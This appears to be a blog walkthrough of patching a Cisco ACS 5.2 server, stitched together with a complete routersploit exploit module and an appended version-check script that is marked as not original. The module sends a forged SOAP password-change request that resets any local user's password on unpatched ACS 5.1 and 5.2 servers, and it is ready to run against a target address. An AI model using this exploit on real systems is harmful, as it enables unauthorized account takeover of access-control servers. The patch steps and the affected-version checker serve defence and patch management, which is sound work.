Cisco ACS 5.2 Patch Installation
I had to patch my ACS 5.2 server a couple of times and thought I would describe the process here. First, you need to download the correct patch from the Cisco web site. You can find it via Products -> Security -> Access Control and Policy -> Policy and Access Management -> Cisco Secure Access Control System, or via this direct link. You need a valid CCO account and an ACS product purchased from Cisco with a valid contract.
![Installation Installation](https://www.richardstrnad.ch/wp-content/uploads/2015/12/2015-12-16_10-25-04.png)
In my case I downloaded the latest patch, “5-2-0-26-11.tar.gpg”, for my ACS 5.2 server. You need to create a software repository on your ACS before copying this file onto it. You can do this via “System Administration > Operations > Software Repositories”. Here is the screenshot of the software repository I created for this.
You can choose from multiple protocols, but I selected FTP after a quick search on the web; lots of users report that TFTP did not work properly. Here is the complete list of values you can choose from.
I used a free FTP server (FileZilla) installed on my laptop and created a username and password for ACS to use when talking to it. You can then install the patch on the ACS server by issuing the “acs patch install <filename> repository <repository-name>” CLI command. Here is the screenshot of my file transfer.
You can verify the progress on the ACS CLI as well. You should see something similar to this.
Once the patch is installed, you can verify the application status with the “show application status acs” and “show version” CLI commands. The screenshot below confirmed that the application is running correctly.
If you are using the GUI, you can confirm the same by clicking the “About” button on the ACS admin page.
![Cisco Acs 5.2 Patch Installation Cisco Acs 5.2 Patch Installation](https://i.ytimg.com/vi/--m0ThKAHhU/maxresdefault.jpg)
```python
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        'name': 'Cisco Secure ACS Unauthorized Password Change',
        'description': 'Module exploits an authentication bypass issue which allows arbitrary '
                       'password change requests to be issued for any user in the local store. '
                       'Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well '
                       'as version 5.2 with either no patches or patches 1 and 2 are vulnerable.',
        'authors': (
            'Jason Kratzer <pyoor[at]flinkd.org>',  # vulnerability discovery & metasploit module
            'Marcin Bury <marcin[at]threat9.com>',  # routersploit module
        ),
        'references': (
            'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html',
        ),
        'devices': (
            'Cisco Secure ACS version 5.1 with patch 3, 4, or 5 installed and without patch 6 or later installed',
            'Cisco Secure ACS version 5.2 without any patches installed',
            'Cisco Secure ACS version 5.2 with patch 1 or 2 installed and without patch 3 or later installed',
        ),
    }

    target = OptIP('', 'Target IPv4 or IPv6 address')
    port = OptPort(443, 'Target HTTP port')
    ssl = OptBool(True, 'SSL enabled: true/false')
    path = OptString('/PI/services/UCP/', 'Path to UCP WebService')
    username = OptString('', 'Username to use')
    password = OptString('', 'Password to use')

    def run(self):
        headers = {'SOAPAction': '"changeUserPass"'}
        data = ('<?xml version="1.0" encoding="utf-8"?>' + '\r\n'
                '<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" '
                'xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
                'xmlns:xsd="http://www.w3.org/1999/XMLSchema">' + '\r\n'
                '<SOAP-ENV:Body>' + '\r\n'
                '<ns1:changeUserPass xmlns:ns1="UCP" SOAP-ENC:root="1">' + '\r\n'
                '<v1 xsi:type="xsd:string">' + self.username + '</v1>' + '\r\n'
                '<v2 xsi:type="xsd:string">fakepassword</v2>' + '\r\n'
                '<v3 xsi:type="xsd:string">' + self.password + '</v3>' + '\r\n'
                '</ns1:changeUserPass>'
                '</SOAP-ENV:Body>' + '\r\n'
                '</SOAP-ENV:Envelope>' + '\r\n\r\n')

        print_status('Issuing password change request for: ' + self.username)

        response = self.http_request(
            method='POST',
            path=self.path,
            data=data,
            headers=headers
        )

        if response is None:
            print_error('Exploit failed. Target seems to be not vulnerable.')
            return

        if 'success' in response.text:
            print_success('Success! Password for {} has been changed to {}'.format(self.username, self.password))
        elif 'Password has already been used' in response.text:
            print_error('Failed! The supplied password has already been used.')
            print_error('Please change the password and try again.')
        elif 'Invalid credentials for user' in response.text:
            print_error('Failed! Username does not exist or target is not vulnerable.')
            print_error('Please change the username and try again.')
        else:
            print_error('Failed! An unknown error has occurred.')

    @mute
    def check(self):
        # it is not possible to verify if target is vulnerable without exploiting system
        return None
```
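A defender-side check built from the affected-release list in the module's `devices` field, as an added example that is not part of the original page or of routersploit: it classifies an ACS release and its installed patch bundles as inside or outside the affected range. It assumes patch bundles are named like the `5-2-0-26-11.tar.gpg` file in the post (trailing field is the patch number) and that patches are cumulative; `AFFECTED`, `parse_patch_name`, `is_affected` and the sample inventory are constructed for illustration.

```python
import re

# Affected ranges from the 'devices' list in the module above:
# (major, minor) -> (lowest affected patch, first patch outside the range); 0 = no patch.
AFFECTED = {
    (5, 1): (3, 6),  # 5.1 with patch 3, 4 or 5, without patch 6 or later
    (5, 2): (0, 3),  # 5.2 with no patch, patch 1 or 2, without patch 3 or later
}

# Assumption: bundles are named <major>-<minor>-<maint>-<build>-<patch>[.tar.gpg],
# following the "5-2-0-26-11.tar.gpg" file name mentioned in the post.
PATCH_NAME = re.compile(r"^(\d+)-(\d+)-(\d+)-(\d+)-(\d+)(?:\.tar\.gpg)?$")

def parse_patch_name(name):
    """Return ((major, minor), patch_number) for a patch bundle name."""
    m = PATCH_NAME.match(name.strip())
    if not m:
        raise ValueError("unrecognised patch name: %r" % name)
    major, minor, _maint, _build, patch = map(int, m.groups())
    return (major, minor), patch

def is_affected(release, installed_patches=()):
    """release is 'major.minor[...]'; installed_patches are patch bundle names."""
    major, minor = (int(p) for p in release.split(".")[:2])
    base = (major, minor)
    if base not in AFFECTED:
        return False
    level = 0  # no patch installed
    for name in installed_patches:
        patch_base, patch = parse_patch_name(name)
        if patch_base != base:
            raise ValueError("patch %s does not match release %s" % (name, release))
        level = max(level, patch)  # assumption: patches are cumulative
    lowest, fixed = AFFECTED[base]
    return lowest <= level < fixed

if __name__ == "__main__":
    # Constructed inventory; host labels and the 5.1 build fields are placeholders.
    inventory = [
        ("acs-lab-1", "5.2.0.26", []),
        ("acs-lab-2", "5.2.0.26", ["5-2-0-26-2"]),
        ("acs-lab-3", "5.2.0.26", ["5-2-0-26-11.tar.gpg"]),
        ("acs-lab-4", "5.1", ["5-1-0-0-4"]),
    ]
    for host, release, patches in inventory:
        state = "AFFECTED" if is_affected(release, patches) else "outside affected range"
        print(host, release, patches, state)
```

Feed it the release and patch list reported by `show version` on each appliance; a patch name that does not match the release raises an error instead of being silently ignored.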